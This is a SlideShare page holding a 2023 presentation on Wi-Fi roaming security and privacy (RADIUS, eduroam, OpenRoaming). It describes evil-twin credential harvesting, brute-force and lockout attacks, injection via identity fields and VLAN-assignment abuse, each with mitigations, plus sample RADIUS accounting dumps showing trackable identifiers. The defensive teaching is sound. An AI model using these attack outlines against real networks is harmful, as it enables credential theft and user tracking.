SlideShare a Scribd company logo

Wi-Fi roaming security and privacy 2023

Karri Huhtanen
Karri Huhtanen

The RADIUS accounting messages contain cleartext user identity and device identifiers that can be used to track users even if the authentication traffic is encrypted. Some ways to mitigate this are: - Use EAP-TLS or EAP-PWD authentication to avoid sending IMSI or username in cleartext - Enable IMSI privacy in EAP-SIM/EAP-AKA methods - Tunnel or encrypt RADIUS accounting messages to prevent eavesdropping of user identities - Use temporary identifiers instead of permanent ones in accounting messages Proper configuration of authentication and accounting privacy features can help prevent user tracking via network monitoring of 802.1X and RADIUS traffic. However, complete anonymity is difficult to achieve in centralized network authentication systems

Technology
1 of 34
Download to read offline
Wi-Fi roaming security and privacy 2023-02-23 Karri Huhtanen
Karri Huhtanen ● Installed first Linux distribution ~1993 (Softlanding Linux System, didn’t know how to exit emacs or vi) ● Have had Internet access since 1993 (but purchased first Internet subscription in 2006) ● Have worked with wireless networks, security and roaming since 1997 ● Was there to connect Finland to eduroam in 2003 (maintained eduroam Finland top-level RADIUS since then) ● Founded Arch Red Oy (nowadays Radiator Software Oy) in Tampere University of Technology in 2003 with two colleagues to productise Wi-Fi access control and roaming solutions (e.g. roam.fi)
This may not be the Wi-Fi network security presentation you are looking for… ● This is a presentation about Wi-Fi roaming security and privacy => e.g. local Wi-Fi network security, radio protocols is covered only briefly ● If there is interest I can do presentation about local Wi-Fi network security as well some other time / event. ● In Slideshare I do have a presentation about that topic: https://www.slideshare.net/khuhtanen/security-issues-in-radius-based-wifi-aaa and more: https://www.slideshare.net/khuhtanen/presentations ● And I am looking for a replacement for Slideshare, because Scribd has reduced the usability of the service with forced advertisements etc.
So let’s start with Wi-Fi network security … :) with slides about Wi-Fi roaming basics as well
How does WPA2/3 Enterprise AAA work? EAP-PWD EAP method based on elliptic Curves, real identity shown EAP-TTLS, TLS secured “envelope” EAP-PEAP outer identity can be anonymous or real identity EAP-TLS Certificate based EAP method, certificate details can be seen EAP-SIM, SIM card based EAP method, EAP-AKA(‘) temporary identities etc. User credentials (username+password, certificate, SIM card) travel within encrypted EAP envelope Network Access Server (NAS): E.g Wi-Fi controller, Wi-Fi AP RADIUS AAA server software RADIUS protocol WPA2/3 Enterprise Authentication
So where does WPA2/3 Enterprise AAA fail? ● Very rarely with technology ● Sometimes with network and security design ● Often with misconfiguration or lack of configuration provisioning ● Most commonly with end users and manual device configuration
What is the difference between WPA2 and WPA3? ● WPA3 mandates Protected Management Frames (PMF), WPA2 has those, but by default does not mandate their use ● WPA3 has additional stronger encryption methods, improvements in the key exchange (SAE instead of PSK) ● WPA2 will still be around and can be secured more with mandating PMF and disabling WPA1, TKIP compatibility
Visited organisation (VO) Wi-Fi network How does Wi-Fi RADIUS roaming work? NAS Roaming visitor’s device Outer identity:anonymous@example.com Inner identity: realusername@example.com 1 Roaming visitor (anonymous@example.com) want to join to this Wi-Fi network 2 NAS forwards request to VO RADIUS server. As example.com is not VO realm, RADIUS server proxies request to its default server 3 Federation Top Level RADIUS server knows that realm example.com is handled by example.com RADIUS server and proxies request to it 4 Home organisation (example.com) RADIUS server and example.com user device negotiate and arrange TLS secured tunnel for authentication. Authentication happens between example.com user device and example.com RADIUS server using the infrastructure in between. 5 Home organisation RADIUS server makes OK or NOT decision based on the authentication and returns access decision response via same infrastructure route 6 NAS lets example.com user device connect (or not) to the VO Wi-Fi network based on the proxied RADIUS response
Radiator Auth.Fi Enterprise Wi-Fi as a service Redundant roam.fi RADIUS service in public cloud RADIUS based roaming federation Tampere University RADIUS Other customers connecting via RADIUS, e.g. City of Seinäjoki, Seinäjoki education etc. Default RADIUS route for all roam.fi members, but no own default RADIUS route RADIUS RADIUS RADIUS RADIUS
example.org RADIUS server example.com RADIUS server How does OpenRoaming work? (https://wballiance.com/openroaming/) Passpoint (Hotspot 2.0) compatible Wi-Fi network SSID: *any* RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx RADIUS capable Wi-Fi controller or example.net’s own RADIUS server OpenRoaming Settled or Settlement-Free Access Service Provider Static Radius over TLS (RadSec, RFC 6614) connection Passpoint (Hotspot 2.0) compatible Wi-Fi network SSID: *any* RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx Global Public DNS Passpoint (Hotspot 2.0) compatible Wi-Fi network SSID: *any* RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx DNS discovery: NAPTR aaa+auth:radius.tls.tcp <realm> SRV <NAPTR result> Name lookup <SRV result> Dynamic RadSec connection to example.net’s IdP service provider Dynamic RadSec connections to example.com IdP Dynamic RadSec connection to example.org IdP user@example.com user@example.net user2@example.com user@example.org
Wi-Fi Roaming Security
Attacker sets up an Evil Twin Wi-Fi network Evil Twin Man-in-the-Middle (MitM) attack NAS Victim’s device Outer identity: anonymous@example.com Inner identity: realusername@example.com Federation Top Level RADIUS server 2) Victim’s device tries to negotiate TLS connection over RADIUS with home organisation RADIUS but evil twin intercepts and tries to impersonate home organisation RADIUS server. Federation RADIUS connectivity is not needed. The evil twin just needs to be able to terminate the TLS tunnel for RADIUS authentication. There have been accidental and ignorant evil twin RADIUS server configurations in organisations. 1) Evil twin sets up a Wi-Fi network with the Wi-Fi network name (SSID) or Roaming Consortium Organisation Identifier (RCOI) as the real roaming network provider. Victim’s device tries automatically to join this network. 3) If victim’s device does not have a proper Wi-Fi network configuration, or capabilities, to check the RADIUS server details, the device may send the credentials (username, password, password hash) to the attacker’s RADIUS server.
Evil Twin attack mitigation ● Proper Wi-Fi configuration profiles (eduroam-cat/geteduroam.app, Windows policies, Apple Configurator) ● Using Private CA signed RADIUS server certificate instead of well-known or system CA (Android) signed one => impersonation with another certificate signed by the same CA does not work (some devices cannot check the certificate CN or SubjectAltNames) ● Using client-certificate authentication (EAP-TLS) or EAP-PWD => no credentials sent, but identity may be still sent ● Rogue access point detection and isolation features in Wi-Fi controllers ● Using separate network credentials (different username and password) or Multi-Factor Authentication => lost credentials are less valuable or do not work
Visited organisation (VO) Wi-Fi network Brute force / Denial of Service (DoS) attack NAS Attacker’s device Outer identity: anonymous@example.com Inner identity: victim@example.com Password: password guess 1) Attacker tries to bruteforce victim’s password by using visited organisation’s Wi-Fi network and roaming infrastructure 2) example.com RADIUS server tries to authenticate victim@example.com from authentication backend (Active Directory, SQL, LDAP etc.) Roaming infrastructure or RADIUS servers do not usually have any rate-limiting. The round trip time for single roaming authentication is usually 1-5 seconds. 3) example.com RADIUS server authentication backend responds to all requests, but may also lock the user account for a while or completely (DoS)
Brute force / Denial of Service (DoS) mitigation ● Rate limiting RADIUS requests in the home organisation RADIUS server ○ Can be complex to design, implement and configure depending on the EAP protocol and inner EAP authentication method ○ Contributes to Denial of Service attack ● Rate limiting requests the in home organisation authentication backend ○ Backends may not have support for rate limiting ○ Contributes to Denial of Service attack ● Rate limiting in the Wi-Fi network controller or Visited Organisation RADIUS server ○ Some support exists for detecting devices failing multiple authentication requests in the controllers ● Automatic locking and unlocking of the user account ● Rate limiting is rarely done because real attacks are equally rare
Visited organisation (VO) Wi-Fi network Injection attack NAS Attacker’s device Outer identity: <exploit>@victim.domain Inner identity: <exploit>@victim.domain | <exploit> Password: <exploit> 1) Attacker inserts the exploit (log4j, SQL, JavaScript, XSS, HTML …) payload to outer or inner identity or password instead of the credentials 3) victim.domain systems processing outer/inner identity and password are exposed to the exploit 2) Any device, RADIUS server, centralised log system, web based user interface etc. which processes or displays the outer identity is exposed to the exploit.
Injection attack comments and mitigation Comments ● There have not yet been successful public cases or occurrences of this attack ● In eduroam this was tested when log4j exploit was published but just placing log4j exploit in the RADIUS request did not work ● Maximum length of an RADIUS attribute is 253 characters, which limits exploits Mitigation ● Sanitising inputs in software ● Sanitising User-Name (outer identity), inner identity and password in RADIUS servers ○ Done sometimes for example for whitespaces in User-Name ○ Done also sometimes for specific characters, but extra care needs to be taken to not break legit requests ○ Only home organisation is exposed to the exploit placed in the inner identity or password
Visited organisation (VO) Wi-Fi network VLAN penetration attack NAS Attacker’s device Outer identity: anonymous@attacker.com Inner identity: realusername@attacker.com Password: realpassword 1) Attacker tries to authenticate to the Visited Organisation Wi-Fi network using roaming credentials from attacker controlled RADIUS server Roaming federation servers often clean at least the standard VLAN assignment attributes from the request but mostly pass all RADIUS attributes through. 2) Attacker’s RADIUS server accepts attacker authentication and includes in its response VLAN assignment attributes targeted at VO’s Wi-Fi equipment. 3) If VO RADIUS does not strip VLAN assignment from responses coming from roaming federation the attributes are passed to the Wi-Fi network equipment as they are 4) If VO uses VLAN assignment in its Wi-Fi network, the Wi-Fi network equipment drops attacker’s device to the VLAN defined by attacker’s RADIUS server.
VLAN penetration attack mitigation ● Strip standard and vendor specific VLAN assignment RADIUS attributes in the own organisation RADIUS server ● Strip attributes in the other federation RADIUS servers ● Take care what organisations can join the roaming federation and in identifying them
Wi-Fi Roaming Privacy
You may have seen this in the Internet …
It’s funny, because it’s true... (at least with these adjustments) MAC ADDRESS TRACKING YOUR DEVICE
MAC addresses, we all got them... ● Most of the network interfaces on your device have a unique address called a MAC address ● Wi-Fi and Bluetooth interfaces may “broadcast” the address even if the interface is not in active use
MAC addresses are used ... ● to identify devices and users ● to control access to network ● to limit use of network resources ● to keep track of sessions ● to assign and track IP addresses ● to track devices => to track persons
Wi-Fi devices send so called probe requests to find out what Wi-Fi networks are available and they may do this even if Wi-Fi is turned off. Bluetooth devices respond to queries and may do own probing as well. This makes it possible to track for example people and their movements in shopping malls. => nice tracking business. 7 people hanging near certain store person’ s path recurring visitor
MAC address randomisation ● first done only in the probe requests ● has been extended to network connections ● is currently per Wi-Fi network (profile) ● is expected in the future to be time-based as well ● is enabled by default in Android 10,11, iOS/iPadOS 14+
Check also globalreachtech.com WWW pages for more analysis of MAC address randomisation by Dr Chris Spencer
Randomised MAC address does not stop tracking ● In most devices randomised MAC address only changes when a network or profile is deleted and create again => recurring visitors can be identified at least within same network ● In authenticated and roaming networks MAC address does not really matter, User-Name and Chargeable-User-Identity can be used if these are not protected ● User-Name and Chargeable-User-Identity are sent in clear text ○ EAP-TLS with TLS<1.3, PEAP/EAP-TTLS, EAP-SIM / EAP-AKA / EAP-AKA’ without IMSI Privacy ● While WPA2/3 authentication protects RADIUS authentication with TLS, RADIUS accounting is sent in clear text
EAP-SIM/EAP-AKA/EAP-AKA’ privacy EAP-SIM, EAP-AKA and EAP-AKA’ are SIM-based WiFi authentication methods used to achieve seamless offloading to carrier and partner WiFi. International Mobile Subscriber Identifier (IMSI) derived from the SIM card is the unique identifier for each user. On the first connection to a WiFi network, the mobile device communicates its permanent subscriber identity information (IMSI), which is then sent to the home operator for authentication. Without IMSI Privacy features, this identity is sent in the clear. A potential 3rd party adversary installing a WiFi sniffer in the vicinity of such networks can harvest permanent identities and track users. This tracking can also be done by the venue or network owner when connecting to the WiFi network. Example: warning in iOS when joining WiFi without IMSI privacy in place
RADIUS Accounting Start message e86bff00 Thu Feb 23 14:50:10 2023 594131: DEBUG: Packet dump: e86bff00 *** Received from 10.255.255.245 port 61503 .... e86bff00 Code: Accounting-Request e86bff00 Identifier: 1 e86bff00 Authentic: <167>[<8>i+<250><208><242><12>A<179><226>d<183><183>S e86bff00 Attributes: e86bff00 Acct-Status-Type = Start e86bff00 NAS-IP-Address = 10.255.255.245 e86bff00 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org" e86bff00 NAS-Port = 0 e86bff00 NAS-Port-Type = Wireless-IEEE-802-11 e86bff00 Calling-Station-Id = "aa2b0b553528" e86bff00 Called-Station-Id = "6026efcdcdc4" e86bff00 Framed-IP-Address = 172.16.145.111 e86bff00 Acct-Multi-Session-Id = "AA2B0B553528-1677156607" e86bff00 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448" e86bff00 Acct-Delay-Time = 0 e86bff00 Aruba-Essid-Name = "RS-TEST" e86bff00 Aruba-Location-Id = "rs-aruba-ap-1" e86bff00 Aruba-User-Vlan = 145 e86bff00 Aruba-User-Role = "RS-TEST" e86bff00 Aruba-Device-Type = "NOFP" e86bff00 Acct-Authentic = RADIUS e86bff00 Service-Type = Login-User e86bff00 NAS-Identifier = "rs-aruba-ap-1" e86bff00 Note IMSI in the User-Name, MAC addresses, IP addresses, Session-Ids, Aruba vendor specific RADIUS attributes.
RADIUS Accounting Stop message d5b39070 Thu Feb 23 14:53:52 2023 182291: DEBUG: Packet dump: d5b39070 *** Received from 10.255.255.245 port 61503 .... d5b39070 Code: Accounting-Request d5b39070 Identifier: 1 d5b39070 Authentic: <188>9>g[<186><157>U|`<244><143>"<171><183><127> d5b39070 Attributes: d5b39070 Acct-Status-Type = Stop d5b39070 NAS-IP-Address = 10.255.255.245 d5b39070 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org" d5b39070 NAS-Port = 0 d5b39070 NAS-Port-Type = Wireless-IEEE-802-11 d5b39070 Calling-Station-Id = "aa2b0b553528" d5b39070 Called-Station-Id = "6026efcdcdc4" d5b39070 Framed-IP-Address = 172.16.145.111 d5b39070 Acct-Multi-Session-Id = "AA2B0B553528-1677156607" d5b39070 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448" d5b39070 Acct-Delay-Time = 0 d5b39070 Aruba-Essid-Name = "RS-TEST" d5b39070 Aruba-Location-Id = "rs-aruba-ap-1" d5b39070 Aruba-User-Vlan = 145 d5b39070 Aruba-User-Role = "RS-TEST" d5b39070 Aruba-Device-Type = "NOFP" d5b39070 Acct-Input-Octets = 35954 d5b39070 Acct-Output-Octets = 855517 d5b39070 Acct-Input-Packets = 549 d5b39070 Acct-Output-Packets = 453 d5b39070 Acct-Input-Gigawords = 0 Note also one Location attribute. There are a lot more related attributes in the standardisation process and under development is also a technology called Wi-Fi sensing, which probably also brings new attributes to RADIUS requests.
How to protect privacy? ● Use MAC address randomisation ● Use anonymous outer identity in Wi-Fi configurations ● Don’t send RADIUS accounting if it is not required (eduroam recommendation) ● Use RadSec (RADIUS over TLS, RFC 6614) to protect both authentication and accounting (OpenRoaming requirement) ● Use EAP-TLS with TLSv1.3 support for client certificate authentication ● Use IMSI Privacy Protection supporting clients, server software and operator
Radiator Auth.Fi Enterprise Wi-Fi as a service Redundant roam.fi RADIUS service in public cloud Adding RadSec to roam.fi roaming federation Tampere University RADIUS Other customers connecting via RADIUS, e.g. City of Seinäjoki, Seinäjoki education etc. RADIUS RADIUS RADIUS RADIUS Two more instances added for inbound RadSec for roam.fi organisations outbound OpenRoaming outbound OpenRoaming inbound OpenRoaming inbound OpenRoaming inbound RadSec for roam.fi organisations inbound RadSec for roam.fi organisations
Thank you, any questions? Slideshare (personal): slideshare.net/khuhtanen/ Radiator Software webinars: radiatorsoftware.com/webinars/ Mastodon (personal): @khuhtanen@infosec.exchange Twitter (personal): @khuhtanen Twitter (company): @RadiatorAAA Radiator Software: radiatorsoftware.com

Recommended

WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Wifi Security
Wifi SecurityWifi Security
Wifi SecurityShital Kat
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Zero Trust Model
Zero Trust ModelZero Trust Model
Zero Trust ModelKen Tulegenov
 
Wireless security
Wireless securityWireless security
Wireless securityparipec
 
Meraki Cloud Networking Workshop
Meraki Cloud Networking WorkshopMeraki Cloud Networking Workshop
Meraki Cloud Networking WorkshopCisco Canada
 
Security on Cloud Computing
Security on Cloud Computing Security on Cloud Computing
Security on Cloud Computing Reza Pahlava
 
Navigating Zero Trust Presentation Slides
Navigating Zero Trust Presentation SlidesNavigating Zero Trust Presentation Slides
Navigating Zero Trust Presentation SlidesIvanti
 

Recommended

WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Wifi Security
Wifi SecurityWifi Security
Wifi SecurityShital Kat
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Zero Trust Model
Zero Trust ModelZero Trust Model
Zero Trust ModelKen Tulegenov
 
Wireless security
Wireless securityWireless security
Wireless securityparipec
 
Meraki Cloud Networking Workshop
Meraki Cloud Networking WorkshopMeraki Cloud Networking Workshop
Meraki Cloud Networking WorkshopCisco Canada
 
Security on Cloud Computing
Security on Cloud Computing Security on Cloud Computing
Security on Cloud Computing Reza Pahlava
 
Navigating Zero Trust Presentation Slides
Navigating Zero Trust Presentation SlidesNavigating Zero Trust Presentation Slides
Navigating Zero Trust Presentation SlidesIvanti
 
Zero trust Architecture
Zero trust Architecture Zero trust Architecture
Zero trust Architecture AddWeb Solution Pvt. Ltd.
 
Identity access management
Identity access managementIdentity access management
Identity access managementProf. Jacques Folon (Ph.D)
 
The Data Center Network Evolution
The Data Center Network EvolutionThe Data Center Network Evolution
The Data Center Network EvolutionCisco Canada
 
Identity & access management
Identity & access managementIdentity & access management
Identity & access managementVandana Verma
 
Access Management with Aruba ClearPass
Access Management with Aruba ClearPassAccess Management with Aruba ClearPass
Access Management with Aruba ClearPassAruba, a Hewlett Packard Enterprise company
 
Network Security Fundamental
Network Security FundamentalNetwork Security Fundamental
Network Security FundamentalMousmi Pawar
 
Understanding Cisco’ Next Generation SD-WAN Technology
Understanding Cisco’ Next Generation SD-WAN TechnologyUnderstanding Cisco’ Next Generation SD-WAN Technology
Understanding Cisco’ Next Generation SD-WAN TechnologyCisco Canada
 
ECMS2 Training Slides.pdf
ECMS2 Training Slides.pdfECMS2 Training Slides.pdf
ECMS2 Training Slides.pdfaplic1
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 
3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AADAndrew Bettany
 
Network Security
Network SecurityNetwork Security
Network Securityhj43us
 
Wireless Networking Security
Wireless Networking SecurityWireless Networking Security
Wireless Networking SecurityAnshuman Biswal
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Applicationedavid2685
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless HackingVIKAS SINGH BHADOURIA
 
Cyber-Security-Unit-1.pptx
Cyber-Security-Unit-1.pptxCyber-Security-Unit-1.pptx
Cyber-Security-Unit-1.pptxTikdiPatel
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYMaganathin Veeraragaloo
 
Navigating the Zero Trust Journey for Today's Everywhere Workplace
Navigating the Zero Trust Journey for Today's Everywhere WorkplaceNavigating the Zero Trust Journey for Today's Everywhere Workplace
Navigating the Zero Trust Journey for Today's Everywhere WorkplaceIvanti
 
Enhance network security with Multi-Factor Authentication for BYOD and guest ...
Enhance network security with Multi-Factor Authentication for BYOD and guest ...Enhance network security with Multi-Factor Authentication for BYOD and guest ...
Enhance network security with Multi-Factor Authentication for BYOD and guest ...Aruba, a Hewlett Packard Enterprise company
 
Meraki Overview
Meraki OverviewMeraki Overview
Meraki OverviewCloud Distribution
 
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and PrivacyDisobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and PrivacyKarri Huhtanen
 
Security issues in RADIUS based Wi-Fi AAA
Security issues in RADIUS based Wi-Fi AAASecurity issues in RADIUS based Wi-Fi AAA
Security issues in RADIUS based Wi-Fi AAAKarri Huhtanen
 

More Related Content

What's hot

The Data Center Network Evolution
The Data Center Network EvolutionThe Data Center Network Evolution
The Data Center Network EvolutionCisco Canada
 
Identity & access management
Identity & access managementIdentity & access management
Identity & access managementVandana Verma
 
Network Security Fundamental
Network Security FundamentalNetwork Security Fundamental
Network Security FundamentalMousmi Pawar
 
Understanding Cisco’ Next Generation SD-WAN Technology
Understanding Cisco’ Next Generation SD-WAN TechnologyUnderstanding Cisco’ Next Generation SD-WAN Technology
Understanding Cisco’ Next Generation SD-WAN TechnologyCisco Canada
 
ECMS2 Training Slides.pdf
ECMS2 Training Slides.pdfECMS2 Training Slides.pdf
ECMS2 Training Slides.pdfaplic1
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 
3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AADAndrew Bettany
 
Network Security
Network SecurityNetwork Security
Network Securityhj43us
 
Wireless Networking Security
Wireless Networking SecurityWireless Networking Security
Wireless Networking SecurityAnshuman Biswal
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Applicationedavid2685
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
Cyber-Security-Unit-1.pptx
Cyber-Security-Unit-1.pptxCyber-Security-Unit-1.pptx
Cyber-Security-Unit-1.pptxTikdiPatel
 
Navigating the Zero Trust Journey for Today's Everywhere Workplace
Navigating the Zero Trust Journey for Today's Everywhere WorkplaceNavigating the Zero Trust Journey for Today's Everywhere Workplace
Navigating the Zero Trust Journey for Today's Everywhere WorkplaceIvanti
 
Enhance network security with Multi-Factor Authentication for BYOD and guest ...
Enhance network security with Multi-Factor Authentication for BYOD and guest ...Enhance network security with Multi-Factor Authentication for BYOD and guest ...
Enhance network security with Multi-Factor Authentication for BYOD and guest ...Aruba, a Hewlett Packard Enterprise company
 

What's hot (20)

Zero trust Architecture
Zero trust Architecture Zero trust Architecture
Zero trust Architecture
 
Identity access management
Identity access managementIdentity access management
Identity access management
 
The Data Center Network Evolution
The Data Center Network EvolutionThe Data Center Network Evolution
The Data Center Network Evolution
 
Identity & access management
Identity & access managementIdentity & access management
Identity & access management
 
Access Management with Aruba ClearPass
Access Management with Aruba ClearPassAccess Management with Aruba ClearPass
Access Management with Aruba ClearPass
 
Network Security Fundamental
Network Security FundamentalNetwork Security Fundamental
Network Security Fundamental
 
Understanding Cisco’ Next Generation SD-WAN Technology
Understanding Cisco’ Next Generation SD-WAN TechnologyUnderstanding Cisco’ Next Generation SD-WAN Technology
Understanding Cisco’ Next Generation SD-WAN Technology
 
ECMS2 Training Slides.pdf
ECMS2 Training Slides.pdfECMS2 Training Slides.pdf
ECMS2 Training Slides.pdf
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 
3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD
 
Network Security
Network SecurityNetwork Security
Network Security
 
Wireless Networking Security
Wireless Networking SecurityWireless Networking Security
Wireless Networking Security
 
System hardening - OS and Application
System hardening - OS and ApplicationSystem hardening - OS and Application
System hardening - OS and Application
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless Hacking
 
Cyber-Security-Unit-1.pptx
Cyber-Security-Unit-1.pptxCyber-Security-Unit-1.pptx
Cyber-Security-Unit-1.pptx
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITY
 
Navigating the Zero Trust Journey for Today's Everywhere Workplace
Navigating the Zero Trust Journey for Today's Everywhere WorkplaceNavigating the Zero Trust Journey for Today's Everywhere Workplace
Navigating the Zero Trust Journey for Today's Everywhere Workplace
 
Enhance network security with Multi-Factor Authentication for BYOD and guest ...
Enhance network security with Multi-Factor Authentication for BYOD and guest ...Enhance network security with Multi-Factor Authentication for BYOD and guest ...
Enhance network security with Multi-Factor Authentication for BYOD and guest ...
 
Meraki Overview
Meraki OverviewMeraki Overview
Meraki Overview
 

Similar to Wi-Fi roaming security and privacy 2023

Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and PrivacyDisobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and PrivacyKarri Huhtanen
 
Security issues in RADIUS based Wi-Fi AAA
Security issues in RADIUS based Wi-Fi AAASecurity issues in RADIUS based Wi-Fi AAA
Security issues in RADIUS based Wi-Fi AAAKarri Huhtanen
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Implementing 802.1x Authentication
Implementing 802.1x AuthenticationImplementing 802.1x Authentication
Implementing 802.1x Authenticationdkaya
 
EAP-TLS (extended version)
EAP-TLS (extended version)EAP-TLS (extended version)
EAP-TLS (extended version)Karri Huhtanen
 
wireless lan security.ppt
wireless lan security.pptwireless lan security.ppt
wireless lan security.pptSagarBedarkar3
 
Wireless LAN Deployment Best Practices
Wireless LAN Deployment Best PracticesWireless LAN Deployment Best Practices
Wireless LAN Deployment Best PracticesMichael Boman
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssueIshan Girdhar
 
Research Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and ScienceResearch Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and Scienceinventy
 
Operations: Security Crash Course — Best Practices for Securing your Company
Operations: Security Crash Course — Best Practices for Securing your CompanyOperations: Security Crash Course — Best Practices for Securing your Company
Operations: Security Crash Course — Best Practices for Securing your CompanyAmazon Web Services
 
Enterprise Cloud Security
Enterprise Cloud SecurityEnterprise Cloud Security
Enterprise Cloud SecurityMongoDB
 
Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010
Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010
Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010Priyanka Aash
 
E Snet Raf Essc Jan2005
E Snet Raf Essc Jan2005E Snet Raf Essc Jan2005
E Snet Raf Essc Jan2005FNian
 
Securing Network Access with Open Source solutions
Securing Network Access with Open Source solutionsSecuring Network Access with Open Source solutions
Securing Network Access with Open Source solutionsNick Owen
 
Corporate Security Issues and countering them using Unified Threat Management...
Corporate Security Issues and countering them using Unified Threat Management...Corporate Security Issues and countering them using Unified Threat Management...
Corporate Security Issues and countering them using Unified Threat Management...Rishabh Dangwal
 

Similar to Wi-Fi roaming security and privacy 2023 (20)

Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and PrivacyDisobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
Disobey 2024: Karri Huhtanen: Wi-Fi Roaming Security and Privacy
 
Security issues in RADIUS based Wi-Fi AAA
Security issues in RADIUS based Wi-Fi AAASecurity issues in RADIUS based Wi-Fi AAA
Security issues in RADIUS based Wi-Fi AAA
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Implementing 802.1x Authentication
Implementing 802.1x AuthenticationImplementing 802.1x Authentication
Implementing 802.1x Authentication
 
EAP-TLS (extended version)
EAP-TLS (extended version)EAP-TLS (extended version)
EAP-TLS (extended version)
 
wireless lan security.ppt
wireless lan security.pptwireless lan security.ppt
wireless lan security.ppt
 
Wireless LAN Deployment Best Practices
Wireless LAN Deployment Best PracticesWireless LAN Deployment Best Practices
Wireless LAN Deployment Best Practices
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 Issue
 
Research Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and ScienceResearch Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and Science
 
Operations: Security
Operations: SecurityOperations: Security
Operations: Security
 
Operations: Security Crash Course — Best Practices for Securing your Company
Operations: Security Crash Course — Best Practices for Securing your CompanyOperations: Security Crash Course — Best Practices for Securing your Company
Operations: Security Crash Course — Best Practices for Securing your Company
 
Enterprise Cloud Security
Enterprise Cloud SecurityEnterprise Cloud Security
Enterprise Cloud Security
 
Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010
Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010
Bypassing Port-Security In 2018: Defeating MacSEC and 802.1x-2010
 
E Snet Raf Essc Jan2005
E Snet Raf Essc Jan2005E Snet Raf Essc Jan2005
E Snet Raf Essc Jan2005
 
Securing Network Access with Open Source solutions
Securing Network Access with Open Source solutionsSecuring Network Access with Open Source solutions
Securing Network Access with Open Source solutions
 
Firewalls
FirewallsFirewalls
Firewalls
 
Isa
IsaIsa
Isa
 
Sem cis ise
Sem cis iseSem cis ise
Sem cis ise
 
AAA server
AAA serverAAA server
AAA server
 
Corporate Security Issues and countering them using Unified Threat Management...
Corporate Security Issues and countering them using Unified Threat Management...Corporate Security Issues and countering them using Unified Threat Management...
Corporate Security Issues and countering them using Unified Threat Management...
 

More from Karri Huhtanen

OpenRoaming and CapPort
